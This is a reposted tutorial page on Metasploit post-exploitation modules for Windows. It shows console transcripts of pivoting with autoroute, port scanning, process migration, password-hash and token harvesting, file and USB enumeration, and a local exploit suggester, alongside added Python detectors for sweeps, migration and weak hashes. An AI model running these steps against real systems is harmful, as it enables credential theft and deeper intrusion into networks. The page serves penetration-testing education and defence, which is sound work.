Metasploit: Post Exploitation
Source: Internet  Published by: oracle.sql.rowid  Editor: 程序博客网  Time: 2024/05/19 22:48
References:
https://www.offensive-security.com/metasploit-unleashed/windows-post-gather-modules/
https://www.offensive-security.com/metasploit-unleashed/windows-post-manage-modules/
autoroute
This one is important!
The “autoroute” post module creates a new route through a Meterpreter session, allowing you to pivot deeper into a target network.
meterpreter > run post/windows/manage/autoroute SUBNET=192.168.218.0 ACTION=ADD
[*] Running module against V-MAC-XP
[*] Adding a route to 192.168.218.0/255.255.255.0...
meterpreter >
Background session 5? [y/N] y
After that, the new route can be used to push the penetration test further into that subnet.
msf exploit(ms08_067_netapi) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set RHOSTS 192.168.218.0/24
RHOSTS => 192.168.218.0/24
msf auxiliary(tcp) > set THREADS 50
THREADS => 50
msf auxiliary(tcp) > set PORTS 445
PORTS => 445
msf auxiliary(tcp) > run
[*] Scanned 027 of 256 hosts (010% complete)
[*] Scanned 052 of 256 hosts (020% complete)
[*] Scanned 079 of 256 hosts (030% complete)
[*] Scanned 103 of 256 hosts (040% complete)
[*] Scanned 128 of 256 hosts (050% complete)
[*] 192.168.218.136:445 - TCP OPEN
[*] Scanned 154 of 256 hosts (060% complete)
[*] Scanned 180 of 256 hosts (070% complete)
[*] Scanned 210 of 256 hosts (082% complete)
[*] Scanned 232 of 256 hosts (090% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tcp) >
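From the defender's side, the sweep above (one pivot host touching port 445 on an entire /24) stands out in flow data. The Python below is an added example, not part of the original post; the flow records, the pivot address 192.168.218.10, and the window and threshold values are constructed starting points, not measured ones.

```python
# Added example: sliding-window detector for an SMB sweep launched through a pivot.
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed NetFlow-style records: (timestamp, src_ip, dst_ip, dst_port).
# The first 40 model the scan shown on the page; the last two are ordinary traffic.
SAMPLE_FLOWS = [
    ("2017-05-01 17:28:01", "192.168.218.10", "192.168.218.%d" % i, 445)
    for i in range(1, 41)
] + [
    ("2017-05-01 17:40:00", "192.168.218.20", "192.168.218.5", 445),
    ("2017-05-01 17:40:05", "192.168.218.20", "192.168.218.6", 80),
]


def detect_smb_sweep(flows, port=445, window=timedelta(minutes=5), threshold=20):
    """Return {src_ip: max_unique_targets} for every source that contacts at
    least `threshold` distinct hosts on `port` inside any sliding `window`."""
    by_src = defaultdict(list)
    for ts, src, dst, dport in flows:
        if dport == port:
            by_src[src].append((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), dst))

    hits = {}
    for src, events in by_src.items():
        events.sort()                       # chronological order
        seen = defaultdict(int)             # dst -> occurrences inside the window
        start = 0
        for t, dst in events:
            seen[dst] += 1
            # Drop events that fell out of the window ending at t.
            while events[start][0] < t - window:
                old = events[start][1]
                seen[old] -= 1
                if seen[old] == 0:
                    del seen[old]
                start += 1
            if len(seen) >= threshold:
                hits[src] = max(hits.get(src, 0), len(seen))
    return hits
```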
migrate
The “migrate” post module will migrate to a specified process or if none is given, will automatically spawn a new process and migrate to it.
meterpreter > run post/windows/manage/migrate
[*] Running module against V-MAC-XP
[*] Current server process: svchost.exe (1092)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 672
[*] New server process: Explorer.EXE (672)
meterpreter >
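When migration is done with a remote thread (an assumption about the injection technique; newer payloads may use other methods), Sysmon records it as Event ID 8 (CreateRemoteThread), and the svchost.exe-to-explorer.exe pattern shown above is what a detection rule looks for. The Python below is an added example, not from the original post; the events and the allowlist of baselined source images are constructed.

```python
# Added example: flag Meterpreter-style migration in Sysmon Event ID 8 records.
import re

# Constructed Sysmon ID 8 events flattened to "key=value" text (no spaces in paths).
SAMPLE_EVENTS = [
    "EventID=8 SourceImage=C:\\Windows\\System32\\svchost.exe SourceProcessId=1092 "
    "TargetImage=C:\\Windows\\explorer.exe TargetProcessId=672 "
    "StartAddress=0x0000000002A30000 StartModule=",
    "EventID=8 SourceImage=C:\\Windows\\System32\\csrss.exe SourceProcessId=412 "
    "TargetImage=C:\\Windows\\explorer.exe TargetProcessId=672 "
    "StartAddress=0x000000007C80B713 StartModule=C:\\Windows\\System32\\kernel32.dll",
    "EventID=1 Image=C:\\Windows\\System32\\notepad.exe ProcessId=2001",
]

FIELD = re.compile(r"(\w+)=(\S*)")

# Assumed per-environment baseline: images that legitimately start threads in explorer.exe.
ALLOWED_SOURCES = {r"c:\windows\system32\csrss.exe"}


def parse_event(line):
    """Turn a flattened event line into a dict of its fields."""
    return dict(FIELD.findall(line))


def detect_migration(events, target="explorer.exe", allowed=ALLOWED_SOURCES):
    """Return (src_pid, tgt_pid, src_image, reasons) for each ID 8 event whose
    target is `target` and whose source is not baselined or whose thread start
    address is not backed by any loaded module (typical of injected code)."""
    alerts = []
    for line in events:
        ev = parse_event(line)
        if ev.get("EventID") != "8":
            continue
        src = ev.get("SourceImage", "").lower()
        tgt = ev.get("TargetImage", "").lower()
        if not tgt.endswith("\\" + target):
            continue
        reasons = []
        if src not in allowed:
            reasons.append("source image not baselined for " + target)
        if not ev.get("StartModule"):
            reasons.append("thread start not backed by a loaded module")
        if reasons:
            alerts.append((ev["SourceProcessId"], ev["TargetProcessId"], src, reasons))
    return alerts
```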
checkvm (check whether the host is a virtual machine)
Checks whether the compromised host is a virtual machine. This module supports Hyper-V, VMware, VirtualBox, Xen, and QEMU virtual machines.
meterpreter > run post/windows/gather/checkvm
[*] Checking if V-MAC-XP is a Virtual Machine .....
[*] This is a VMware Virtual Machine
meterpreter >
credential_collector (collect credentials)
Harvests password hashes and tokens on the compromised host.
meterpreter > run post/windows/gather/credentials/credential_collector
[*] Running module against V-MAC-XP
[+] Collecting hashes...
    Extracted: Administrator:7bf4f254f224bb24aad3b435b51404ee:2892d23cdf84d7a70e2eb2b9f05c425e
    Extracted: Guest:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
    Extracted: HelpAssistant:2e61920ebe3ed6e6d108113bf6318ee2:5abb944dc0761399b730f300dd474714
    Extracted: SUPPORT_388945a0:aad3b435b51404eeaad3b435b51404ee:92e5d2c675bed8d4dc6b74ddd9b4c287
[+] Collecting tokens...
    NT AUTHORITY\LOCAL SERVICE
    NT AUTHORITY\NETWORK SERVICE
    NT AUTHORITY\SYSTEM
    NT AUTHORITY\ANONYMOUS LOGON
meterpreter >
dumplinks (dump existing shortcut files)
The “dumplinks” module parses the .lnk files in a user's Recent Documents, which could be useful for further information gathering. Note that, as shown below, we first need to migrate into a user process prior to running the module.
meterpreter > run post/windows/manage/migrate
[*] Running module against V-MAC-XP
[*] Current server process: svchost.exe (1096)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 1824
[*] New server process: Explorer.EXE (1824)
meterpreter > run post/windows/gather/dumplinks
[*] Running module against V-MAC-XP
[*] Extracting lnk files for user Administrator at C:\Documents and Settings\Administrator\Recent\...
[*] Processing: C:\Documents and Settings\Administrator\Recent\developers_guide.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\documentation.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\Local Disk (C).lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\Netlog.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\notes (2).lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\notes.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\Release.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\testmachine_crashie.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\user manual.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\user's guide.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\{33D9A762-90C8-11d0-BD43-00A0C911CE86}_load.lnk.
[*] No Recent Office files found for user Administrator. Nothing to do.
meterpreter >
enum_applications (list installed applications)
meterpreter > run post/windows/gather/enum_applications
[*] Enumerating applications installed on WIN7-X86

Installed Applications
======================

 Name                                                              Version
 ----                                                              -------
 Adobe Flash Player 25 ActiveX                                     25.0.0.148
 Google Chrome                                                     58.0.3029.81
 Google Update Helper                                              1.3.33.5
 Google Update Helper                                              1.3.25.11
 Microsoft .NET Framework 4.6.1                                    4.6.01055
 Microsoft .NET Framework 4.6.1                                    4.6.01055
 Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148    9.0.30729.4148
 MySQL Connector Net 6.5.4                                         6.5.4
 Security Update for Microsoft .NET Framework 4.6.1 (KB3122661)    1
 Security Update for Microsoft .NET Framework 4.6.1 (KB3127233)    1
 Security Update for Microsoft .NET Framework 4.6.1 (KB3136000v2)  2
 Security Update for Microsoft .NET Framework 4.6.1 (KB3142037)    1
 Security Update for Microsoft .NET Framework 4.6.1 (KB3143693)    1
 Security Update for Microsoft .NET Framework 4.6.1 (KB3164025)    1
 Update for Microsoft .NET Framework 4.6.1 (KB3210136)             1
 Update for Microsoft .NET Framework 4.6.1 (KB4014553)             1
 VMware Tools                                                      10.1.6.5214329
 XAMPP 1.8.1-0                                                     1.8.1-0

[*] Results stored in: /root/.msf4/loot/20170501172851_pwk_192.168.0.6_host.application_876159.txt
meterpreter >
hashdump
The “hashdump” post module will dump the local user accounts on the compromised host using the registry.
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...

Administrator:500:7bf4f254b222ab21aad3b435b51404ee:2792d23cdf84d1a70e2eb3b9f05c425e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:2e61920ebe3ed6e6d108113bf6318ee2:5abb944dc0761399b730f300dd474714:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:92e5d2c675bed8d4dc6b74ddd9b4c287:::
meterpreter >
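The pwdump-style lines above (user:rid:LM:NT:::) and the Extracted: user:LM:NT lines from credential_collector earlier are the format an administrator audits after a sanctioned dump, looking for blank passwords, accounts that still store an LM hash (LM hashing enabled) and accounts that share a password. The Python below is an added example, not from the original post; its sample input is the hashdump output shown here, and the empty-LM and empty-NT constants are the well-known values for an empty password.

```python
# Added example: parse and audit hashdump / credential_collector output.
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of an empty (or absent) password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash (MD4) of an empty password
HEX32 = re.compile(r"^[0-9a-fA-F]{32}$")

# Sample input: the hashdump lines shown above (user:rid:LM:NT:::)
SAMPLE_DUMP = """\
Administrator:500:7bf4f254b222ab21aad3b435b51404ee:2792d23cdf84d1a70e2eb3b9f05c425e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:2e61920ebe3ed6e6d108113bf6318ee2:5abb944dc0761399b730f300dd474714:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:92e5d2c675bed8d4dc6b74ddd9b4c287:::
"""


def parse_pwdump(text):
    """Parse hashdump ('user:rid:LM:NT:::') and credential_collector
    ('Extracted: user:LM:NT') lines. The first two 32-hex fields are LM and NT;
    the user is the last non-numeric field before them (all-digit names unsupported)."""
    accounts = []
    for line in text.splitlines():
        parts = [p.strip() for p in line.split(":") if p.strip()]
        hashes = [p.lower() for p in parts if HEX32.match(p)]
        first = next((i for i, p in enumerate(parts) if HEX32.match(p)), len(parts))
        labels = [p for p in parts[:first] if not p.isdigit()]
        if len(hashes) < 2 or not labels:
            continue  # status line such as "[+] Collecting hashes..." or malformed input
        accounts.append({"user": labels[-1], "lm": hashes[0], "nt": hashes[1]})
    return accounts


def audit(accounts):
    """Return {user: [findings]}. An LM hash is two independent 8-byte halves, so a
    trailing half equal to the empty-LM half means the password is 7 chars or shorter."""
    findings = defaultdict(list)
    by_nt = defaultdict(list)
    for a in accounts:
        if a["nt"] == EMPTY_NT:
            findings[a["user"]].append("blank password")
        if a["lm"] != EMPTY_LM:
            findings[a["user"]].append("LM hash stored (LM hashing enabled)")
            if a["lm"][16:] == EMPTY_LM[16:]:
                findings[a["user"]].append("password is 7 characters or shorter")
        by_nt[a["nt"]].append(a["user"])
    for nt, users in by_nt.items():
        if len(users) > 1 and nt != EMPTY_NT:
            for u in users:
                findings[u].append("shares a password with " + ", ".join(x for x in users if x != u))
    return dict(findings)
```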
usb_history
The “usb_history” module enumerates the USB drive history on the compromised system.
meterpreter > run post/windows/gather/usb_history
[*] Running module against V-MAC-XP
[*] C: Disk ea4cea4c
    E: STORAGE#RemovableMedia#8&3a01dffe&0&RM#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    A: FDC#GENERIC_FLOPPY_DRIVE#6&1435b2e2&0&0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    D: IDE#CdRomNECVMWar_VMware_IDE_CDR10_______________1.00____#3031303030303030303030303030303030303130#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
[*] Kingston DataTraveler 2.0 USB Device
=====================================================================================
    Disk lpftLastWriteTime     Thu Apr 21 13:09:42 -0600 2011
    Volume lpftLastWriteTime   Thu Apr 21 13:09:43 -0600 2011
    Manufacturer               (Standard disk drives)
    ParentIdPrefix             8&3a01dffe&0 ( E:)
    Class                      DiskDrive
    Driver                     {4D36E967-E325-11CE-BFC1-08002BE10318}\0001
meterpreter >
local_exploit_suggester
See which other points could still be exploited.
msf > use post/multi/recon/local_exploit_suggester
msf post(local_exploit_suggester) > show options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION          2                yes       The session to run this module on.
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf post(local_exploit_suggester) > run
[*] 192.168.101.129 - Collecting local exploits for x86/windows...
[*] 192.168.101.129 - 31 exploit checks are being tried...
[+] 192.168.101.129 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 192.168.101.129 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 192.168.101.129 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.101.129 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 192.168.101.129 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[*] Post module execution completed